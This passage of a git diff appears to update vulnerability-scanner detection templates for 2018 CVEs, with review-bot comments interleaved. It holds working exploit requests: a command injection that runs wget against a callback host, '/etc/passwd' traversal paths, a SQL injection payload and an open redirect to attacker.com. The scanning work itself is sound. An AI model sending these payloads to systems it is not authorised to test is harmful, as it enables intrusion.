http://{{interactsh-url}}`;wget http://{{interactsh-url}}&ipv=0 + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index f4982c8731..af6bee0a00 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml 
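Review bot: Each raw request in the new GPON template injects the callback twice (once in backticks, `busybox wget http://{{interactsh-url}}`, and again after `;`), and the second request repeats the pair with plain `wget`, so a vulnerable device makes up to four outbound connections per scan; one form per request is enough to confirm injection and halves the noise on the target. The `?images/` suffix on `POST /GponForm/diag_Form?images/` is doing real work — as far as I can tell it is the companion authentication bypass described in the vpnmentor reference — and deserves a comment such as `# '?images/' in the path bypasses authentication (see reference)`. With `stop-at-first-match: true` and an OAST-only matcher, the first request may be reported as the hit even when the interaction came from the second; acceptable for detection, but worth knowing when reading results.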
@@ -1,14 +1,17 @@ id: CVE-2018-10818 info: - name: LG NAS Devices - Remote Code Execution (Unauthenticated) + name: LG NAS Devices - Remote Code Execution author: gy741 severity: critical - description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. + description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter. reference: - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - tags: cve,cve2018,lg-nas,rce,oast + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818 + classification: + cve-id: CVE-2018-10818 + tags: cve,cve2018,lg-nas,rce,oast,injection requests: - raw: @@ -36,3 +39,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml index d93affb5d4..072879bf42 100644 --- a/cves/2018/CVE-2018-10822.yaml +++ b/cves/2018/CVE-2018-10822.yaml 
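Review bot: The `classification` block added to CVE-2018-10818.yaml carries only `cve-id`, while every other `classification` block in this commit also has `cvss-metrics`, `cvss-score` and `cwe-id`; with `severity: critical` asserted above it, the vector and score that justify that rating should be filled in (`cvss-metrics: <vector from the NVD record>`, `cvss-score: <score from the NVD record>`, `cwe-id: <CWE from the NVD record>`). The new MITRE reference omits the `CVE-` prefix in `name=2018-10818`, unlike e.g. CVE-2018-12095.yaml in this commit, which uses `name=CVE-2018-12095`; use `- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10818` so the link form is consistent across the repository.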
@@ -4,16 +4,18 @@ info: name: D-Link Routers - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. + description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request. reference: - https://www.exploit-db.com/exploits/45678 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 - tags: cve,cve2018,lfi,router,dlink + - https://seclists.org/fulldisclosure/2018/Oct/36 + - http://sploit.tech/2018/10/12/D-Link.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-10822 cwe-id: CWE-22 + tags: cve,cve2018,lfi,router,dlink requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-10823.yaml b/cves/2018/CVE-2018-10823.yaml index 81ca5b0d08..0f611d04de 100644 --- a/cves/2018/CVE-2018-10823.yaml +++ b/cves/2018/CVE-2018-10823.yaml 
@@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/45676 - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 - tags: cve,cve2018,rce,iot,dlink,router + - https://seclists.org/fulldisclosure/2018/Oct/36 + - http://sploit.tech/2018/10/12/D-Link.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2018-10823 cwe-id: CWE-78 + tags: cve,cve2018,rce,iot,dlink,router requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-10956.yaml b/cves/2018/CVE-2018-10956.yaml new file mode 100644 index 0000000000..dd4b86b2af --- /dev/null +++ b/cves/2018/CVE-2018-10956.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-10956 + +info: + name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal. + author: 0x_Akoko + severity: high + description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal. + reference: + - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ + - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb + - https://www.cvedetails.com/cve/CVE-2018-10956 + - https://www.exploit-db.com/exploits/44916/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-10956 + cwe-id: CWE-22 + metadata: + shodan-query: http.title:"Orchid Core VMS" + tags: cve,cve2018,orchid,vms,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-11231.yaml b/cves/2018/CVE-2018-11231.yaml new file mode 100644 index 0000000000..b6ea184ff6 --- /dev/null +++ b/cves/2018/CVE-2018-11231.yaml 
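Review bot: In the new CVE-2018-10956.yaml the `name` value ends with a period (`... Unauthenticated Directory Traversal.`), which no other template name in this commit does; `name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal` matches the convention. The `author: 0x_Akoko` differs in case from `author: 0x_akoko` in CVE-2018-10201.yaml in this same commit; if author attribution is keyed on the literal string, these count as two contributors, so the spelling should be unified. The `description` merely restates the `name`; the nettitude advisory already in `reference` gives the affected endpoint and the unauthenticated-access condition that a one-sentence description could summarise.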
@@ -0,0 +1,37 @@ +id: CVE-2018-11231 + +info: + name: Opencart Divido plugin - Sql Injection + author: ritikchaddha + severity: high + reference: + - http://foreversong.cn/archives/1183 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 + tags: opencart,sqli,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-11231 + cwe-id: CWE-89 + description: "In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information." + +requests: + - raw: + - | + POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 + Host: {{Hostname}} + + {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2} + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-11409.yaml b/cves/2018/CVE-2018-11409.yaml index 888187304c..ddaaba03ea 100644 --- a/cves/2018/CVE-2018-11409.yaml +++ b/cves/2018/CVE-2018-11409.yaml 
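Review bot: The new CVE-2018-11231.yaml writes `cvss-score: 8.10`, reintroducing the two-decimal form that this same commit normalises to one decimal everywhere else (e.g. `8.10` → `8.1` in CVE-2018-11776.yaml); YAML parses both as the float 8.1, but the file should read `cvss-score: 8.1` for consistency. The `info` key order also diverges from the layout the commit is establishing: here `tags` precedes `classification` and the quoted `description` comes last, whereas the edited templates place `description` after `severity` and `tags` at the end of `info`. `name: Opencart Divido plugin - Sql Injection` should spell the acronym as `SQL Injection`, as the rest of the repository does.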
@@ -4,14 +4,18 @@ info: name: Splunk Sensitive Information Disclosure author: harshbothra_ severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409 - tags: cve,cve2018,splunk + description: Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-11409 + - https://github.com/kofa2002/splunk + - https://www.exploit-db.com/exploits/44865/ + - http://www.securitytracker.com/id/1041148 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - description: "Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key." + tags: cve,cve2018,splunk requests: - method: GET diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml index a5c31e20e5..fc3353a738 100644 --- a/cves/2018/CVE-2018-11709.yaml +++ b/cves/2018/CVE-2018-11709.yaml 
@@ -1,17 +1,20 @@ id: CVE-2018-11709 info: - name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) + name: WordPress wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 - tags: cve,cve2018,wordpress,xss,wp-plugin + description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-11709 + - https://wordpress.org/plugins/wpforo/#developers + - https://wpvulndb.com/vulnerabilities/9090 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-11709 cwe-id: CWE-79 + tags: cve,cve2018,wordpress,xss,wp-plugin requests: - method: GET @@ -33,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/31 diff --git a/cves/2018/CVE-2018-11759.yaml b/cves/2018/CVE-2018-11759.yaml index 124b5bd839..d031ff11eb 100644 --- a/cves/2018/CVE-2018-11759.yaml +++ b/cves/2018/CVE-2018-11759.yaml 
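Review bot: The rewritten `description` in CVE-2018-11709.yaml says "WordPress wpForo Forum plugin before 1.4.12 for WordPress", naming WordPress twice; `description: WordPress wpForo Forum plugin before 1.4.12 allows unauthenticated reflected cross-site scripting via the URI.` reads cleanly. The old text's mention of the vulnerable function (`wpforo_get_request_uri` in `wpf-includes/functions.php`) was dropped with the rewrite; if the intent was to keep descriptions short that is fine, but the code location was the one detail not recoverable from the `name`.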
@@ -4,14 +4,18 @@ info: name: Apache Tomcat JK Status Manager Access author: harshbothra_ severity: high - reference: https://github.com/immunIT/CVE-2018-11759 - tags: cve,cve2018,apache + description: The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical. + reference: + - https://github.com/immunIT/CVE-2018-11759 + - https://lists.apache.org/thread.html/6d564bb0ab73d6b3efdd1d6b1c075d1a2c84ecd84a4159d6122529ad@%3Cannounce.tomcat.apache.org%3E + - http://www.securityfocus.com/bid/105888 + - https://lists.debian.org/debian-lts-announce/2018/12/msg00007.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-11759 cwe-id: CWE-22 - description: "The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. 
It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical." + tags: cve,cve2018,apache,tomcat,status requests: - method: GET @@ -24,6 +28,7 @@ requests: - type: status status: - 200 + - type: word words: - "JK Status Manager" diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml index 98bff06e5c..b2e30d97ec 100644 --- a/cves/2018/CVE-2018-11776.yaml +++ b/cves/2018/CVE-2018-11776.yaml 
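Review bot: The new `description` in CVE-2018-11759.yaml is a single plain scalar of several hundred characters, long enough that the diff rendering here breaks it across two lines; CVE-2018-1207.yaml in this same commit shows the repository already uses a block scalar for long descriptions. Writing it as `description: >-` followed by the text wrapped at a readable width keeps the runtime value identical (folded newlines become spaces) while making the diff reviewable. The trailing-space cleanup after "reverse proxy. " would then also be handled by the folding rules rather than left inside the value.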
@@ -4,14 +4,18 @@ info: name: Apache Struts2 S2-057 RCE author: pikpikcu severity: high - reference: https://github.com/jas502n/St2-057 - tags: cve,cve2018,apache,rce,struts + description: 'Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.' + reference: + - https://github.com/jas502n/St2-057 + - https://cwiki.apache.org/confluence/display/WW/S2-057 + - https://security.netapp.com/advisory/ntap-20180822-0001/ + - http://www.securitytracker.com/id/1041547 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2018-11776 cwe-id: CWE-20 - description: "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace." + tags: cve,cve2018,apache,rce,struts requests: - method: GET @@ -23,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-11784.yaml b/cves/2018/CVE-2018-11784.yaml index ec8276c693..371917e082 100644 --- a/cves/2018/CVE-2018-11784.yaml +++ b/cves/2018/CVE-2018-11784.yaml 
@@ -1,17 +1,20 @@ id: CVE-2018-11784 info: - name: Apache Tomcat Open Redirect + name: Apache Tomcat - Open Redirect author: geeknik - description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. - reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E severity: medium - tags: tomcat,redirect,cve,cve2018 + description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. + reference: + - https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E + - https://nvd.nist.gov/vuln/detail/CVE-2018-11784 + - http://www.securityfocus.com/bid/105524 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N - cvss-score: 4.30 + cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 + tags: tomcat,redirect,cve,cve2018,apache requests: - method: GET @@ -23,3 +26,5 @@ requests: regex: - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com" part: header + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index f5ecf6d832..4e98b1fb1d 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml 
@@ -4,17 +4,17 @@ info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal author: daffainfo severity: critical - description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. + description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution. reference: - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://www.exploit-db.com/exploits/48614 - tags: cve,cve2018,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-12031 cwe-id: CWE-22 + tags: cve,cve2018,lfi requests: - method: GET @@ -26,10 +26,12 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or part: body - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-12054.yaml b/cves/2018/CVE-2018-12054.yaml index 7daf35a964..99e0202257 100644 --- a/cves/2018/CVE-2018-12054.yaml +++ b/cves/2018/CVE-2018-12054.yaml 
@@ -4,16 +4,18 @@ info: name: Schools Alert Management Script - Arbitrary File Read author: wisnupramoedya severity: high - description: Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal. + description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal. reference: - https://www.exploit-db.com/exploits/44874 - - https://www.cvedetails.com/cve/CVE-2018-12054 - tags: cve,cve2018,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2018-12054 + - https://github.com/unh3x/just4cve/issues/4 + - https://www.exploit-db.com/exploits/44874/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-12054 cwe-id: CWE-22 + tags: cve,cve2018,lfi requests: - method: GET @@ -25,8 +27,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-1207.yaml b/cves/2018/CVE-2018-1207.yaml index 2d01313840..8a89ac6be8 100644 --- a/cves/2018/CVE-2018-1207.yaml +++ b/cves/2018/CVE-2018-1207.yaml 
@@ -1,24 +1,24 @@ id: CVE-2018-1207 info: - name: Dell iDRAC7 and iDRAC8 Devices Code Injection/RCE + name: Dell iDRAC7/8 Devices - Remote Code Injection author: dwisiswant0 severity: critical - reference: https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf description: | - This template supports the detection part only. - - Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability + Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code. - - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py - tags: cve,cve2018,dell,injection,rce + reference: + - https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf + - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py + - https://nvd.nist.gov/vuln/detail/CVE-2018-1207 + - http://en.community.dell.com/techcenter/extras/m/white_papers/20485410 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-1207 cwe-id: CWE-94 + tags: cve,cve2018,dell,injection,rce requests: - method: GET @@ -28,4 +28,6 @@ requests: - type: word words: - "calling init: /lib/" - part: all + part: response + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml index 202b897b33..cd09108f78 100644 --- a/cves/2018/CVE-2018-12095.yaml +++ b/cves/2018/CVE-2018-12095.yaml 
@@ -9,12 +9,12 @@ info: - https://www.exploit-db.com/exploits/44895 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 - https://cxsecurity.com/issue/WLB-2018060092 - tags: cve,cve2018,xss classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.40 + cvss-score: 5.4 cve-id: CVE-2018-12095 cwe-id: CWE-79 + tags: cve,cve2018,xss requests: - method: GET diff --git a/cves/2018/CVE-2018-12296.yaml b/cves/2018/CVE-2018-12296.yaml new file mode 100644 index 0000000000..02f94c31e4 --- /dev/null +++ b/cves/2018/CVE-2018-12296.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-12296 + +info: + name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure + author: princechaddha + severity: high + description: Insufficient access control in /api/external/7.0/system.System.get_infos in Seagate NAS OS version 4.3.15.1 allows attackers to obtain information about the NAS without authentication via empty POST requests. + reference: + - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12296 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-12296 + cwe-id: CWE-732 + tags: cve,cve2018,seagate,nasos,disclosure,unauth + +requests: + - raw: + - | + POST /api/external/7.0/system.System.get_infos HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + + matchers: + - type: word + part: body + words: + - '"version":' + - '"serial_number":' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"version": "([0-9.]+)"' diff --git a/cves/2018/CVE-2018-12300.yaml b/cves/2018/CVE-2018-12300.yaml new file mode 100644 index 0000000000..c1d638cc99 --- /dev/null +++ b/cves/2018/CVE-2018-12300.yaml 
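Review bot: In the new CVE-2018-12296.yaml the extractor regex `'"version": "([0-9.]+)"'` requires exactly one space after the colon, while the two `words` matchers above it (`'"version":'`, `'"serial_number":'`) accept any spacing; a response serialised without the space would match but extract nothing. `- '"version":\s*"([0-9.]+)"'` keeps `group: 1` intact and tolerates either form. Whether the device's JSON serialiser emits the space cannot be confirmed from the template alone, so the looser pattern is the safer default.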
@@ -0,0 +1,28 @@ +id: CVE-2018-12300 + +info: + name: Seagate NAS OS 4.3.15.1 - Open Redirect + author: 0x_Akoko + severity: medium + description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. + reference: + - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 + - https://www.cvedetails.com/cve/CVE-2018-12300 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-12300 + cwe-id: CWE-601 + tags: cve,cve2018,redirect,seagate,nasos + +requests: + - method: GET + + path: + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2018/CVE-2018-12613.yaml b/cves/2018/CVE-2018-12613.yaml index 40bfe42ba7..9b58a055d2 100644 --- a/cves/2018/CVE-2018-12613.yaml +++ b/cves/2018/CVE-2018-12613.yaml 
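Review bot: The redirect target in the new CVE-2018-12300.yaml is `http://www.attacker.com#`, a real third-party domain, and the header regex anchors on `attacker\.com`; CVE-2018-11784.yaml in this same commit performs the equivalent open-redirect check against `example.com`, the RFC 2606 reserved name. Using `- '{{BaseURL}}/echo-server.html?code=test&state=http://www.example.com#'` and `example\.com\/?` in the regex keeps scanner-induced redirects from ever pointing at a domain the project does not control and aligns the two templates. The blank line between `- method: GET` and `path:` inside the request mapping is also unlike the other templates here and can be removed.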
@@ -4,14 +4,18 @@ info: name: PhpMyAdmin 4.8.1 Remote File Inclusion author: pikpikcu severity: high - reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 - tags: cve,cve2018,phpmyadmin,lfi + description: An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). + reference: + - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 + - https://www.phpmyadmin.net/security/PMASA-2018-4/ + - https://www.exploit-db.com/exploits/44928/ + - http://www.securityfocus.com/bid/104532 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 - description: "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication)." 
+ tags: cve,cve2018,phpmyadmin,lfi requests: - method: GET @@ -23,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status diff --git a/cves/2018/CVE-2018-12634.yaml b/cves/2018/CVE-2018-12634.yaml index ed8c7f4131..55841846f4 100644 --- a/cves/2018/CVE-2018-12634.yaml +++ b/cves/2018/CVE-2018-12634.yaml @@ -1,17 +1,21 @@ id: CVE-2018-12634 info: - name: Exposed CirCarLife System Log + name: CirCarLife Scada <4.3 - System Log Exposure author: geeknik - description: CirCarLife is an internet-connected electric vehicle charging station - reference: https://circontrol.com/ severity: critical - tags: cve,cve2018,scada,circontrol,circarlife,logs + description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station. + reference: + - https://circontrol.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-12634 + - https://www.seebug.org/vuldb/ssvid-97353 + - https://www.exploit-db.com/exploits/45384/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-12634 cwe-id: CWE-200 + tags: cve,cve2018,scada,circontrol,circarlife,logs requests: - method: GET @@ -32,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-1271.yaml b/cves/2018/CVE-2018-1271.yaml index 52a285b05a..ebc43c3998 100644 --- a/cves/2018/CVE-2018-1271.yaml +++ b/cves/2018/CVE-2018-1271.yaml 
